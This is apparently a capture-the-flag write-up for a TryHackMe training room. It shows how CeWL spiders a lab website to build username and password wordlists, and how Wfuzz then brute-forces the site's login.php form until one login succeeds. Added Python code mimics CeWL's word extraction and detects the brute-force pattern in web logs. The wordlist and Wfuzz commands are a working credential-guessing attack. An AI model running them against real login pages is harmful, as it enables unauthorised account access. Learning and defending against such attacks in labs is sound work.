Day 4

This room is a simple introduction to the Linux tool CeWL. CeWL (pronounced "cool") is a custom word list generator that spiders websites to create word lists based on the site's content.

Learning Objectives

  • What is CeWL?

  • What are the capabilities of CeWL?

  • How can we leverage CeWL to generate a custom wordlist from a website?

  • How can we customise the tool's output for specific tasks?

The room is a very straightforward introduction to the tool with all the commands given.

CeWL is a wordlist generator that is unique compared to other tools available. While many tools rely on pre-defined lists or common dictionary attacks, CeWL creates custom wordlists based on web page content.

We start by making a basic wordlist from the website and writing it to a file.

┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ cewl http://10.10.126.196 -w output.txt
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

The contents of the file are a word list as follows.

└─$ cat output.txt
Start
End
and
the
AntarctiCrafts
our
Stylesheet
.
.
.
Visit
office
Send
Message
Login
Submit

CeWL provides a lot of options that allow you to tailor the wordlist to your needs:

  1. Specify spidering depth: The -d option allows you to set how deep CeWL should spider. For example, to spider two links deep: cewl http://machine_ip -d 2 -w output1.txt

  2. Set minimum and maximum word length: Use the -m and -x options respectively. For instance, to get words between 5 and 10 characters: cewl http://machine_ip -m 5 -x 10 -w output2.txt

  3. Handle authentication: If the target site is behind a login, you can use the -a flag for form-based authentication.

  4. Custom extensions: The --with-numbers option will append numbers to words, and using --extension allows you to append custom extensions to each word, making it useful for directory or file brute-forcing.

  5. Follow external links: By default, CeWL doesn't spider external sites, but using the --offsite option allows you to do so.
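To make the -m, -x, --lowercase and --with-numbers options concrete, here is a small Python approximation of CeWL's word extraction, run over a constructed page (added illustration, not CeWL's own code; CeWL's real tokenising regex and frequency sort differ in details, and --with-numbers is modelled as CeWL's help text describes it, accepting tokens that contain digits).

```python
import re
from collections import Counter
from html.parser import HTMLParser


class _TextExtractor(HTMLParser):
    """Collect visible text; script and style bodies are skipped, as CeWL does."""

    def __init__(self):
        super().__init__()
        self.parts = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.parts.append(data)


def extract_words(html, min_len=3, max_len=None, lowercase=False, with_numbers=False):
    """Unique words from the page text, most frequent first (ties keep first-seen order).
    min_len/max_len mirror -m/-x, lowercase mirrors --lowercase, with_numbers mirrors --with-numbers."""
    parser = _TextExtractor()
    parser.feed(html)
    token = r"[A-Za-z0-9]+" if with_numbers else r"[A-Za-z]+"
    counts = Counter()
    for word in re.findall(token, " ".join(parser.parts)):
        if lowercase:
            word = word.lower()
        if len(word) < min_len or (max_len is not None and len(word) > max_len):
            continue
        counts[word] += 1
    return [w for w, _ in sorted(counts.items(), key=lambda kv: -kv[1])]


# Constructed sample page, not the room's real site.
SAMPLE_HTML = """<html><head><title>AntarctiCrafts</title>
<style>.x{color:red}</style></head>
<body><h1>AntarctiCrafts Team</h1>
<p>Meet our officers and members. Visit the office or Send a Message.</p>
<form action="login.php"><button>Login</button><button>Submit</button></form>
<script>var secret2023 = 'nope';</script>
<footer>All rights reserved 2023</footer></body></html>"""
```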

For this room we need to gain access to the portal located at http://machine_ip/login.php.

We first create a username and password list based on the website.

Username List:

┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ cewl -d 0 -m 5 -w usernames.txt http://10.10.126.196/team.php --lowercase
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ cat usernames.txt
antarcticrafts
stylesheet
start
members
officer
.
.
.
links
rights
reserved

Password List:

┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ cewl -d 2 -m 5 -w passwords.txt http://10.10.126.196 --with-numbers
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ cat passwords.txt
Start
AntarctiCrafts
Stylesheet
About
.
.
.
Message
Login
Submit

Now we can attempt to brute-force the login page with Wfuzz.

Wfuzz is a tool designed for brute-forcing web applications. It can be used to find unlinked resources (directories, servlets, scripts, etc.), brute-force GET and POST parameters to check for different kinds of injection (SQL, XSS, LDAP), brute-force form parameters (user/password), and perform general fuzzing.

┌──(kali㉿kali)-[~/THM/AOC2023]
└─$ wfuzz -c -z file,usernames.txt -z file,passwords.txt --hs "Please enter the correct credentials" -u http://10.10.126.196/login.php -d "username=FUZZ&password=FUZ2Z"
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.126.196/login.php
Total requests: 9361

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000006317:   302        118 L    297 W      4442 Ch     "[REDACTED] - [REDACTED]"

Total time: 0
Processed Requests: 9361
Filtered Requests: 9360
Requests/sec.: 0
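From the defender's side, the run above leaves a very recognisable trace: thousands of POSTs to login.php from one client in seconds, failures answered with 200 (the form re-rendered with "Please enter the correct credentials") and the one success answered with 302. The following Python detector, an added example that is not part of the room, parses combined-format web server log lines and flags that pattern; the log lines, client addresses and threshold are constructed for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache/nginx combined log format; only the fields the detection needs are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "method": m["method"], "path": m["path"].split("?")[0],
            "status": int(m["status"]),
            "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")}


def detect_login_bruteforce(lines, path="/login.php", threshold=20, window=timedelta(minutes=1)):
    """Return {ip: summary} for clients that POST to `path` at least `threshold` times inside `window`.
    redirect_seen marks a 302 from the same client, the success signature of the portal in this write-up."""
    posts = defaultdict(list)
    for rec in filter(None, map(parse_line, lines)):
        if rec["method"] == "POST" and rec["path"] == path:
            posts[rec["ip"]].append((rec["ts"], rec["status"]))
    findings = {}
    for ip, evs in posts.items():
        evs.sort()
        best, start = 0, 0
        for end in range(len(evs)):          # sliding window over sorted timestamps
            while evs[end][0] - evs[start][0] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            findings[ip] = {"attempts": len(evs), "max_in_window": best,
                            "redirect_seen": any(s == 302 for _, s in evs)}
    return findings


def constructed_log():
    """Constructed sample, not real traffic: 30 rapid POSTs from one client, the last answered
    with 302, plus two ordinary requests from another client."""
    base = datetime(2023, 12, 4, 10, 0, 0, tzinfo=timezone.utc)
    lines = []
    for i in range(30):
        ts = (base + timedelta(seconds=i)).strftime("%d/%b/%Y:%H:%M:%S %z")
        status = 302 if i == 29 else 200     # failed logins re-render the form with 200
        lines.append(f'10.10.14.5 - - [{ts}] "POST /login.php HTTP/1.1" {status} 4442 "-" "Wfuzz/3.1.0"')
    lines.append('10.10.14.9 - - [04/Dec/2023:10:00:10 +0000] "GET /team.php HTTP/1.1" 200 2311 "-" "Mozilla/5.0"')
    lines.append('10.10.14.9 - - [04/Dec/2023:10:00:15 +0000] "POST /login.php HTTP/1.1" 200 4442 "-" "Mozilla/5.0"')
    return lines
```

A flagged client with redirect_seen set is the case worth treating as a likely credential compromise rather than just noisy scanning.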

We now have our username and password. We can proceed to log in to the portal.

We can see this is a mailbox and the flag can be found here.
